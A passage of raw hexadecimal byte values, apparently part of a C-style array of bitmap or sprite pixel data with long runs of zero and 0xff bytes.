0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xdb, 0x07, 0xdb, 0x10, 0xdb, 0x18, 0xdb, 0x17, 0xfe, 0x2f, 0xfd, 0x6c, 0xfd, 0x8c, 0xfd, 0xb3, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xf3, 0xfc, 0xa7, 0xfc, 0x83, 0xfd, 0x53, 0xfc, 0x13, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x07, 0xdb, 0x13, 0xff, 0x24, 0xff, 0x2c, 0xff, 0x2c, 0xff, 0x24, 0xdf, 0x24, 0xfe, 0x60, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xec, 0xfe, 0x1b, 0x9b, 0x04, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdb, 0x00, 0xdb, 0x04, 0xff, 0x13, 0xff, 0x1c, 0xff, 0x34, 0xff, 0x58, 0xff, 0x5f, 0xff, 0x4f, 0xff, 0x4f, 0xfd, 0xdf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x83, 0xfc, 0x00, 0xff, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x07, 0xdb, 0x18, 0xff, 0x1c, 0xff, 0x28, 0xff, 0x54, 0xff, 0x67, 0xff, 0x64, 0xff, 0x80, 0xfe, 0xf8, 0xfe, 0xf8, 0xff, 0xfb, 0xff, 0xfc, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xf7, 0xfc, 0xec, 0xfc, 0xef, 0xfc, 0xff, 0xfc, 0x08, 0xfe, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdb, 0x00, 0xdb, 0x0b, 0xff, 0x20, 0xff, 0x24, 0xff, 0x2f, 0xff, 0x3f, 0xff, 0x43, 0xff, 0x4b, 0xff, 0x5c, 0xff, 0x7c, 0xff, 0x9f, 0xff, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xd3, 0xfd, 0x1c, 0xfc, 0x1c, 0xfc, 0x28, 0xfc, 0x0f, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x0c, 0xff, 0x2b, 0xff, 0x33, 0xff, 0x3b, 0xff, 0x40, 0xff, 0x3b, 0xff, 0x34, 0xff, 0x3f, 0xff, 0x54, 0xff, 0x74, 0xff, 0xbb, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xe7, 0xfd, 0x18, 0xff, 0x03, 0xff, 0x00, 0xb7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x07, 0xff, 0x20, 0xff, 0x30, 0xff, 0x3c, 0xff, 0x50, 0xff, 0x50, 0xff, 0x40, 0xff, 0x38, 0xff, 0x4b, 0xff, 0x63, 0xfe, 0xc4, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xf3, 0xfe, 0xfc, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xf7, 0xfd, 0xe3, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x2c, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdb, 0x00, 0xdb, 0x03, 0xff, 0x0f, 0xdb, 0x18, 0xff, 0x23, 0xff, 0x43, 0xff, 0x53, 0xff, 0x4b, 0xff, 0x3c, 0xff, 0x37, 0xff, 0x40, 0xfe, 0xa8, 0xfe, 0x9f, 0xff, 0x83, 0xff, 0xa0, 0xfe, 0xf8, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xf3, 0x9f, 0x0f, 0xfe, 0x37, 0xfd, 0x7f, 0xfc, 0x48, 0xfc, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x03, 0xff, 0x08, 0xff, 0x0b, 0xff, 0x0f, 0xff, 0x28, 0xff, 0x38, 0xff, 0x3c, 0xff, 0x2c, 0xff, 0x1f, 0xdb, 0x13, 0xff, 0x28, 0xff, 0x47, 0xff, 0x88, 0xfe, 0xfb, 0xfd, 0xff, 0xfc, 0xff, 0xfd, 0xfb, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0x1b, 0x07, 0xdf, 0x0f, 0xdf, 0x0c, 0xdf, 0x04, 0xff, 0x00, 0xff, 0x00, 0xb7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xdb, 0x03, 0xdb, 0x03, 0xdb, 0x04, 0xdb, 0x0c, 0xff, 0x17, 0xff, 0x20, 0xff, 0x0c, 0xff, 0x07, 0xff, 0x0b, 0xff, 0x1b, 0xff, 0x60, 0xfd, 0xf4, 0xfd, 0xc7, 0xfe, 0x2f, 0xfc, 0xc4, 0xfc, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xa4, 0xfc, 0x3b, 0xfc, 0xcc, 0xfc, 0xff, 0xbf, 0x04, 0xff, 0x00, 0xdb, 0x03, 0xff, 0x07, 0xdb, 0x03, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xff, 0x07, 0xff, 0x04, 0xdb, 0x04, 0xff, 0x03, 0xff, 0x08, 0xff, 0x1f, 0xfe, 0x38, 0xff, 0x24, 0xdf, 0x1f, 0xfc, 0xa3, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x8b, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xec, 0xfc, 0xac, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0x7b, 0xfc, 0x00, 0xfd, 0x00, 0xfc, 0x37, 0xfd, 0x08, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb7, 0x00, 0xdb, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x03, 0xdb, 0x04, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xff, 0x04, 0xff, 0x07, 0xff, 0x0c, 0xdf, 0x1c, 0xfd, 0x83, 0xfc, 0xf0, 0xfc, 0x43, 0xfc, 0x00, 0xfc, 0xef, 0xfc, 0xff, 0xfc, 0xeb, 0xfc, 0x73, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xec, 0xfc, 0x78, 0xfc, 0xff, 0xfc, 0xff, 0xfc, 0xc8, 0xfc, 0x00, 0xfc, 0x5f, 0xfc, 0xff, 0xfc, 0x50, 0xfc, 0x00, 0xf8, 0x00, 0xfd, 0x00, 0xff, 0x00, 0xff, 0x00, 0xb7, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xfd, 0x2b, 0xfe, 0x28, 0x17, 0x00, 0xfc, 0x00, 0xfc, 0x7b, 0xfc, 0xff, 0xfc, 0x33, 0xfc, 0x00, 0xfc, 0xa7, 0xfc, 0xff, 0xfc, 0x8c, 0xf8, 0x00, 0xfc, 0x5b, 0xfc, 0xff, 0xfc, 0x60, 0xf8, 0x00, 0xf8, 0x00, 0xfc, 0x2c, 0xfc, 0x1b, 0xfc, 0x00, 0x00, 0x00, 0xb7, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xb7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xff, 0x03, 0xff, 0x03, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xdb, 0x04, 0xff, 0x08, 0xdb, 0x03, 0xff, 0x00, 0xfc, 0x27, 0xfc, 0x44, 0xf8, 0x00, 0xff, 0x00, 0xfc, 0x1f, 0xfc, 0xdf, 0xf8, 0x00, 0xff, 0x00, 0xf8, 0x00, 0xfc, 0x9f, 0xfc, 0x00, 0xfe, 0x00, 0xff, 0x00, 0xf8, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb7, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x03, 0xff, 0x03, 0xff, 0x00, 0xff, 0x00, 0xf8, 0x00, 0xff, 0x00, 0xff, 0x00, 0xfc, 0x00, 0xfc, 0x13, 0xfc, 0x00, 0xff, 0x00, 0xfd, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x03, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb7, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 